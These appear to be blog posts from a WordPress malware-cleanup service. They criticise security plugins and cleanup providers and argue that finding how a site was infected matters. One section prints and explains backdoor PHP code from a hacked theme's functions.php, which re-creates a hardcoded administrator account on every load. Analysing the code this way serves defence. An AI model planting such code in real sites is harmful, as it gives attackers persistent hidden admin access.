Wordfence Security Daily Malware Scans Are Not the Way to Clean Up a Malware Infection of a WordPress Website

If your WordPress website has been hacked and contains malware, a common suggestion for cleaning it up is to use the Wordfence Security plugin. There are a number of problems with that. One being that it won’t necessarily catch all the malware, as someone looking for help with the plugin recently noted:

Hello, I’m using the free version and I’m doing daily scans because my site has a malware. At some point the scan did not detect some new folders that have been created in the root folder.

The folders has some random characters as an name and it contains an index file and a cache folder.

The larger problem with what they were bringing up there is that if you had cleaned up the malware, there wouldn’t even be more malware to possibly detect day after day. So something has gone wrong there.

If there is malware on a WordPress website, the focus shouldn’t be on removing the malware, though it does need to be removed. It should be how it got there, which is something that Wordfence Security can’t determine. When the plugin removes the files without determining that, it makes it harder to figure out.

Another important reason for trying to figure out how the website was infected, which have seen over and over in years of being brought in to re-clean hacked WordPress websites, is that in doing the work to try to figure out how the website was hacked, you often find malware or other malicious code that otherwise would have been missed.

Figuring out how the malware got there in the first place or at least stopping it from getting back in basic part of a proper hack cleanup, but something that many security providers, including the developer of Wordfence Security, either don’t do or fail to accomplish.

Wordfence Care Failed to Resolve Reoccurring Malware Issue on WordPress Website

When it comes to cleaning up hacked WordPress websites, the most important part of doing that is often not done. That being trying to figure out how the website was hacked and fixing that. Sometimes you can get away with failing to do that, other times the problem is going to come back again and again.

As an example of that, take someone who was looking for help with a hacked WordPress website recently from the developer of the Wordfence Security plugin. They wrote that they had done the following:

Steps I have taken so far:

  1. Scanned my website using a security plugin, but the malware continues to reappear.
  2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
  3. Checked theme files for suspicious code and removed any identified malicious snippets.
  4. Updated WordPress, themes, and plugins to their latest versions.
  5. Changed all passwords related to my website, including admin, FTP, and database.

But that hadn’t resolved the issue:

Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection.

They rightly understood the need to figure out the source of the infection, which notably is something that many malware cleanup services for WordPress websites don’t do. We know they don’t do that because we are often brought in to re-clean hacked WordPress websites where that wasn’t done before and doing that shows that in addition to not finding the source of the infection; the provider missed parts of the malware currently on the website.

The response from the developer didn’t provide helpful information, but it did promote hiring them to clean up the website. According to the poster they tried that, getting the Wordfence Care service, but that didn’t help:

I already got the Wordfence Care, but you still can’t give the permanent solution for me.

The results from the more expensive Wordfence Response don’t appear to be better.

WordPress Security Plugins Won’t Fully Disinfect a Hacked WordPress Website

When it comes to cleaning up hacked WordPress websites, there is a lot of advice suggesting solutions that are easy, but don’t properly address the situation. That leads to continuing issues that could have been addressed quickly if handled by a professional like us.

As an example of what not to do, take a recent post from the WordPress Support Forum, where someone claimed to have done a full disinfection of a website, which hadn’t worked:

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

One thing missing there is trying to figure out how the website was hacked. That is important for multiple reasons. One of them being that if you don’t know how the website was hacked, then you can’t be sure the issue has been addressed and won’t happen again. Another reason is that if you don’t know how the website was hacked, then you also likely don’t know when it was hacked. Restoring a backup file won’t clear out malicious code, if the malicious code is in the backup as well.

Another issue is that they were trying to find malicious code using several WordPress security plugins, which didn’t find it:

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S[ecurity], All-In-One Security (AIOS), and Anti-Malware Security and Brute-Force Firewall. None have detected it.

While they are claiming the code was invisible, their description of it tells a different story:

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

During a proper cleanup, theme files would be checked and before even starting on a hack cleanup, a professional should have noticed the code was being loaded on the website (even though the subsequent code loaded would only occur in some instances). A professional would have been looking for the code before starting, as often people think that some other issue with a website is a hack. So they want to make sure a hack cleanup is needed before starting.

Automated malware detection doesn’t work well, as it both fails to detect plenty of malicious code (as occurred here) and also flags legitimate code as being malicious.

How Another Hacker Was Able to Re-Add a Malicious User to a Hacked WordPress Site

In October, we wrote about how a hacker was able to re-add a malicious user to a hacked WordPress site using a database trigger. That isn’t the only way they can do that, as we found while working on cleaning up a hacked WordPress website recently. In this situation, as soon as a malicious Administrator account was deleted, a new account with the same account information would be created. The cause was code added to the end of the functions.php file for the theme currently in use on the website.

That code was as follows:

add_action( 'init', function () {
 
$username = 'kshivvamaster';
$password = 'Admin@2020';
$email_address = 'kshivva@gmail.com';
 
if ( ! username_exists( $username ) ) {
$user_id = wp_create_user( $username, $password, $email_address );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
 
} );

The first line causes the rest of the code to run whenever WordPress loads. The rest of the code checks if the username “kshivvamaster” exists. If it doesn’t exist, it creates a new account with that username along with the specified password and email address in the code. That account is given the Administrator role.

SiteLock is Still Leaving Websites in a Broken State After Incomplete Malware Removals

It usually isn’t too difficult to properly clean up malware infected websites, but that doesn’t mean that security companies won’t cut corners. Here was someone recently looking for help after SiteLock had left their website broken after doing malware removal:

My website was recently hacked. I worked with the domain host and SiteLock to remove the malware. The site is now back, but not functioning properly. The formatting is generic and the menu is gone. Any help would be greatly appreciated.

That isn’t a new problem, that has been going on for years. Despite that, web hosts continue to partner with them because they pay the web hosts a significant amount of their fees. That probably helps to explain the result, since lots of the money being paid for the service isn’t being spent on the work.

If you hire us to remove malware from your website, we will make sure that everything is working again before we even charge you for the work.

You Don’t Need to Start From Scratch if Your WordPress Website is Infected with Malware

When it comes to dealing with a WordPress website that has been infected with malware, sometimes the idea of dealing with it by starting over is suggested. Not only is that not usually necessary, it can sometimes lead you back to where you started, an infected website.

In almost all instances an infected WordPress websites can be cleaned up, so unless you are very unlucky and have a website that can’t be cleaned because it so damaged, the only reason to start over would be that you can’t handle cleaning it yourself or afford to hire someone to properly clean it up (which is not the same hiring someone to clean it up, based on all the websites we are hired to re-clean after things haven’t been done properly).

A problem with going the route of staring over is that the websites don’t just get hacked, something had to have gone wrong security wise. Starting over isn’t always going to directly deal with that. So if, say, your website was hacked because of an unfixed security vulnerability in a WordPress plugin and you start over and install the plugin on a new WordPress install, then the vulnerability can be exploited again. There are plenty of other issues like that, which wouldn’t be resolved by starting over.

Dealing With a Hacked WordPress Website Without a Backup

One question that comes up from time to time when we are brought in to deal with hacked WordPress websites is can the website be cleaned up if there isn’t a backup. In almost all situations, the answer is yes, and in fact a backup usually isn’t all that useful for cleaning up the website.

One suggested solution for cleaning up a hacked WordPress website, or websites using other software for that matter, is to revert to a clean backup. The big problem with that is that the backup has to be clean, reverting to a backup that from when the website was already hacked, won’t solve the problem. Since hacks can have started well before it becomes noticed, simply reverting to a backup from before you were aware the website was hacked isn’t always going to do the trick. Assuming it can be figured out when the website was originally hacked, most of the work needed to clean up the website without a backup has likely already been done.

The work needed to clean up the website without a backup can also be important for determining how the website was hacked. If you don’t figure out how the website was hacked, then you can’t insure it won’t get hacked again because of the same issue. (Surprisingly, a lot hack clean up providers that claim to have expertise in dealing with hacked websites, don’t even try to figure how websites have been hacked, leading to far too many of their customers’ websites getting hacked again.)

Another issue with reverting to a backup is that you need to do the reversion correctly. Done incorrectly files that were part of the hack could still be on the website or the website could be broken (sometimes in a way that is only realized later).

The exception to the ability to do a cleanup without a backup would be if the files or data has been deleted or is damaged beyond repair, which in almost all instances isn’t the case.

The Likely Reason Malware Keeps Returning to Your WordPress Website

One question that comes up from time to time when dealing with malware infected WordPress websites is why does malware keep returning to the website. While there are multiple reasons that can occur, what we find most often with websites that keep getting infected, WordPress or otherwise, is that they haven’t actually been infected more than once. Instead, the original issue was never fully resolved.

While some malware can be difficult to fully remove, in most cases what we find is that corners were cut during the cleanup process. That isn’t just an issue with hiring someone who doesn’t have much experience with malware infected websites, as we have often been brought in to re-remove malware form websites when that is the case with supposedly reputable providers. That includes companies who are frequently promoted by journalists, despite what they are covering being itself a pretty big warning that something is a miss with the company.

To properly clean up malware on a website, there are three key components:

  • Removing the malware.
  • Getting the website secured as possible (which usually involves getting any software on the website up to date).
  • Trying to determine how the website was infected and fix that.

If a company’s marketing material doesn’t focus on those, then there is a good chance they are cutting corners. You might get lucky and not experience the downside of that, but if you are like lots of people hire us after having hired someone else, you end paying more and dealing with more problems than if just hired us to remove it in the first place.

index.php Files with the Comment “Silence is golden.” on a WordPress Website Are Not Malware

When it comes to dealing with hacked websites a lot of people would be best off leaving it to professionals (assuming you can find one, among all the unqualified companies), as it is easy for people to get very confused about what is going on. We recently had someone contact us about cleaning up a hacked WordPress website where they were saying that part of the malware was that index.php files had been corrupted with “Silence is golden.” and nothing else.

What they were referring to are files that come with WordPress that had the following contents:

<?php
// Silence is golden.

The purpose of those files is to make sure that a listing of files in the directory they are located is not shown in certain server configurations. So those files are harmless and not in any way malware.

Is the “Insecure content blocked: the page is trying to load scripts from unauthenticated sources.” message related to malware or another hack?

We recently had someone contact us looking for a cleanup of a hacked website due to the Chrome web browser displaying the message “Insecure content blocked: the page is trying to load scripts from unauthenticated sources.” when visiting their website, which they thought was caused by malware on the website. It was good that they contacted us and not one of the many unscrupulous security companies out there, as instead of taking people’s money before even knowing if our service is really needed, we actually make sure the website is hacked first (when there is a real hack, we don’t charge until the work on the cleanup is completed).

In this case the website wasn’t hacked, instead it was simply a case where some of the URLs for content on the page were using HTTP URLs even when pages of the website were requested over HTTPS, which creates a minor security issue, hence the warning.

What is important to note though is that this type of situation could be caused by malware, as it could be a situation where a hacker has added HTML code to the website’s pages that causes requests to malicious content over HTTP  even when the pages are served over HTTPS. So if you start seeing the warning without having changed anything on the website, a hack could be a cause of the message.

The important take away from this is that you want to make sure to confirm that your website is hacked before hiring someone to clean it. If a company is interested in taking your money before even confirming it is hacked, they probably don’t have your best interest at heart, which based on our experience of being brought in to deal with the results of others improperly handling hacked websites for years, could lead you to have even more problems than the initial hack.